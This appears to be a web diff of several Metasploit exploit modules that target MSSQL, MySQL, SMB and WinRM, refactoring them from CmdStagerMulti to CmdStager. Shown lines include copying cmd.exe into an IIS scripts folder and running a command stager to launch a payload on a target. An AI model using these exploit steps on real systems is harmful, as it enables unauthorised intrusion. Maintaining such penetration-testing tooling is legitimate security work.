res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z)
|
res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z)
|
||||||
|
|
||||||
# Use the CMD stager to get a payload running
|
# Use the CMD stager to get a payload running
|
||||||
execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
|
execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname, :flavor => :tftp })
|
||||||
|
|
||||||
# Save these file names for later deletion
|
# Save these file names for later deletion
|
||||||
@exe_cmd_copy = exe_fname
|
@exe_cmd_copy = exe_fname
|
||||||
|
|
|
@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
include Msf::Exploit::Remote::MSSQL
|
include Msf::Exploit::Remote::MSSQL
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
|
|
@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::MSSQL
|
include Msf::Exploit::Remote::MSSQL
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
#include Msf::Exploit::CmdStagerDebugAsm
|
#include Msf::Exploit::CmdStagerDebugAsm
|
||||||
#include Msf::Exploit::CmdStagerDebugWrite
|
#include Msf::Exploit::CmdStagerDebugWrite
|
||||||
#include Msf::Exploit::CmdStagerTFTP
|
#include Msf::Exploit::CmdStagerTFTP
|
||||||
|
|
|
@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::MSSQL_SQLI
|
include Msf::Exploit::Remote::MSSQL_SQLI
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
|
|
@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::MYSQL
|
include Msf::Exploit::Remote::MYSQL
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(
|
super(
|
||||||
|
|
|
@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::SMB
|
include Msf::Exploit::Remote::SMB
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
|
|
@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::WinRM
|
include Msf::Exploit::Remote::WinRM
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
@ -41,6 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'WfsDelay' => 30,
|
'WfsDelay' => 30,
|
||||||
'EXITFUNC' => 'thread',
|
'EXITFUNC' => 'thread',
|
||||||
'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
|
'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
|
||||||
|
'CMDSTAGER::DECODERSTUB' => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_sleep")
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
||||||
|
@ -60,11 +61,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
], self.class
|
], self.class
|
||||||
)
|
)
|
||||||
|
|
||||||
register_advanced_options(
|
|
||||||
[
|
|
||||||
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
|
|
||||||
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_sleep")]),
|
|
||||||
], self.class)
|
|
||||||
@compat_mode = false
|
@compat_mode = false
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue